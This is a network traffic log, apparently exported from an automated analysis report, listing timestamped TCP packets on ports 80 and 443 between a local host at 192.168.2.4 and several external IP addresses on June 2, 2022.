                                                                              Jun 2, 2022 01:53:22.355360031 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.355376005 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355392933 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355444908 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.355447054 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355479956 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355506897 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.355520964 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355539083 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.355560064 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355619907 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.355633020 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355654955 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355709076 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.355721951 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355739117 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.355747938 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355806112 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.355818987 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355839968 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355907917 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.355917931 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355937958 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.355973005 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.355984926 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.356000900 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.356026888 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.356090069 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.356102943 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.356122971 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.356159925 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.356172085 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.356189966 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.387198925 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.387267113 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.387311935 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.387342930 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.387360096 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.387399912 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.406933069 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.407040119 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.407068014 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.407092094 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.407114029 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.407138109 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.407162905 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.407176018 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.407216072 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.407221079 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.407284975 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.407298088 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.407330036 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.407357931 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.407368898 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.407409906 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.407428980 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.407490015 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.407504082 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.407530069 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.407567978 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.407581091 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.407601118 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.407629967 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.407705069 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.407716990 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.407782078 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.407844067 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.407917023 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.407944918 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.408015013 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.408047915 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.408113003 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.408127069 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.408142090 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.408193111 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.408226967 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.408466101 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.408545017 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.408592939 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.408674955 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.408693075 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.408763885 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.408795118 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.408876896 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.408885956 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.408907890 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.408960104 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.408981085 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409054041 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409068108 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409128904 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409282923 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409357071 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409383059 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409457922 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409471989 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409491062 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409535885 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409586906 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409655094 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409667015 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409687996 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409740925 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409751892 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409780979 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409787893 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409861088 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409873962 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409902096 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409945965 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409980059 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.414604902 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:40.235853910 CEST4975880192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:40.587559938 CEST4976480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:53:40.682431936 CEST804976480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:53:40.682535887 CEST4976480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:53:40.683010101 CEST4976480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:53:40.819966078 CEST804976480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:53:40.865782022 CEST804976480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:53:40.865875959 CEST4976480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:53:40.866113901 CEST4976480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:53:40.961503983 CEST804976480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:53:41.028842926 CEST4976580192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.045341969 CEST8049765140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.046226978 CEST4976580192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.050184965 CEST4976580192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.067187071 CEST8049765140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.067491055 CEST4976580192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.074817896 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.074856997 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.075050116 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.105389118 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.105418921 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.158729076 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.158890963 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.749869108 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.749927044 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.750588894 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.753603935 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.753628016 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.772119999 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.772260904 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.772284031 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.772310019 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.772536993 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.772624016 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.777277946 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.777312040 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.777328968 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.777954102 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:42.160839081 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.160898924 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.161051989 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.161731005 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.161760092 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.208158016 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.208303928 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.223193884 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.223227978 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.223520994 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.223625898 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.224648952 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.268506050 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.357242107 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.357419014 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.357466936 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.357548952 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.357569933 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.357701063 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.357778072 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.357794046 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.357820034 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.357903957 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.357909918 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.357924938 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.357980013 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.358000040 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.358011961 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.358084917 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.358095884 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.358114004 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.358165026 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.358201027 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.358325005 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.358450890 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.358520985 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.358561039 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.358582973 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.358596087 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.358637094 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.359105110 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.359215975 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.359302998 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.359318972 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.359499931 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.359796047 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.360611916 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.360683918 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.360745907 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.360747099 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.360771894 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.360791922 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.360822916 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.361314058 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.361439943 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.361532927 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.361551046 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.362159967 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.362231016 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.362257004 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.362283945 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.362301111 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.362910986 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.372047901 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.372283936 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.372359991 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.372437954 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.372461081 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.372509003 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.372530937 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.372711897 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.372787952 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.372797012 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.372814894 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.372878075 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.372890949 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.373440981 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.373514891 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.373527050 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.373543024 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.373614073 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.373626947 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.374300003 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.374377012 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.374386072 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.374401093 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.374475956 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.374489069 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.374773026 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.374789000 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.375313997 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.375438929 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.375468016 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.376061916 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.377082109 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.377101898 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.377175093 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.377204895 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.377235889 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.377254009 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.377263069 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.377274990 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.377338886 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.378892899 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.378932953 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.379066944 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.379095078 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.379112959 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.379219055 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.389147043 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.389199018 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.389328957 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.389360905 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.389380932 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.389568090 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.390985012 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.391026020 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.391098976 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.391124010 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.391136885 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.391549110 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.392036915 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.392080069 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.392132044 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.392148972 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.392168999 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.392205954 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.393069029 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.393109083 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.393212080 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.393229008 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.393251896 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.393481970 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.393939972 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.393980026 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.394051075 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.394067049 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.394087076 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.394340992 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.394903898 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.394943953 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.395018101 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.395036936 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.395052910 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.395190001 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.401844025 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.401887894 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.401958942 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.401984930 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.402050972 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.402085066 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.402579069 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.402724981 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.402728081 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.402748108 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.402812958 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.404373884 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.404416084 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.404469013 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.404505014 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.404546976 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.404561043 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.404562950 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.404586077 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.404619932 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.404644966 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.404659986 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.404697895 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.404715061 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.406157017 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.406215906 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.406270981 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.406297922 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.406312943 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.406368017 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.406399965 CEST49767443192.168.2.4185.199.108.133
